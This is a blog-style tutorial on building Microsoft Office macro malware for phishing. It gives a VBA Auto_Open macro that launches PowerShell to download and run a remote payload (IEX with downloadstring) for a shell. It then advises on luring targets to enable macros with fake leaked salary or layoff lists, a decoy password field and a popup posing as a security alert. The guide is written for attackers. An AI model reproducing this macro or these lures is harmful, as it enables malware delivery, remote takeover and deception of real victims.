How to create Microsoft Office macro malware – phishing attack

Macro is still the most popular method for delivery of malware. It can be embedded in any Microsoft Office document; Word, Excel or PowerPoint. Generally the main purpose of macros is to automate tasks. Macros are written in programming language VBA (Virtual Basic for Applications). VBA is very flexible, so there is many options and ways to create harmful macro. Typically, macro malware is transmitted through phishing emails containing malicious attachments. The macro virus spreads quickly as users share infected documents. Once an infected macro is executed, it will typically infect every other document on a user’s computer.

In this post I will show you how to create Excel document with macro, which will download and execute the payload with the goal to obtain shell.

  1. Creating malware – payload

First you need to create the payload. There is many options to do it, so I will not dig deep into it. In my case I created undetectable payload with my custom tool. I saved the payload as .txt file and put it on the server.

2. Create Excel document

Create new excel document and save it as Excel Macro-Enabled Workbook.

In the toolbar go to the View and select Macros. Add the Macro name and assign the Macro for your file. After that click create.

When you will click create, the VBA editor will appear. Add the following text and save it.

Sub Auto_Open()
Dim exec As String
exec = “powershell.exe “”IEX ((new-object net.webclient).downloadstring(‘’))”””
Shell (exec)
End Sub

Do not forget to change the location and name of payload. This script will run powershell and create new object, which will download the string from your payload on the server and execute it.

Basically that’s it. All you need now is to deliver this excel document to the target and somehow make her to enable macros when the document is opened. As soon as macros is enabled the VBA code will be executed and you will get the shell. Of course, before execution the handler should be set up.

Ok, that’s sounds easy in theory. But to make target click enable-macros with the words “Security Warning” next to it is not so easy. Any macro, weather it’s been code signed or not, will contain this exact same message. Users have become somewhat jaded to the potential severity of clicking this button, so we have two problems left to solve. The first is technical and the second is question of social engineering. The latter combined with convincing email or other delivery pretext can be highly effective attack against even the most security aware targets.

One particularly effective means of getting a target to open a document and enable macros, even when their hindbrain is screaming at them to stop it – is to imply that information has been sent to them in error, it’s something they should not be seeing. Something that would give them an advantage in some way or something that would put them at a disadvantage if they ignore it.

Imagine if for example one employer or more of them receive the email with the company top secret e.g salaries by all employers or list of reduction of employers, which in the first place is not intended for them. You can imagine how curious would you be, if you received email like this.

So, the level of success is based how good the pretext is and how good and sharp are yours social engineering skills. To get more ideas I strongly recommend you to read the book by Chris Hadnagy (Social Engineering: The Art of Human hacking).

In the further text I will not show you how to create convincing pretext. Rather that I will show you how to increase chances to make target enabling macros.

I created excel document which looks like that include some company top secret information, for which to see you need to enable macros and type the password.

So, when the target will click enable-macros, the payload will be downloaded and executed. After that target can type password in the only one open field (all other fields are writing protected). You can give the password to the target in the pretext or ask her to use windows password. However, in any case when they click ok button it will generate a popup message box masquerading as a security alert that includes the username of the currently logged in user.

This is personalized approach that makes the difference between success and failure when delivering your initial payload.


Add a Comment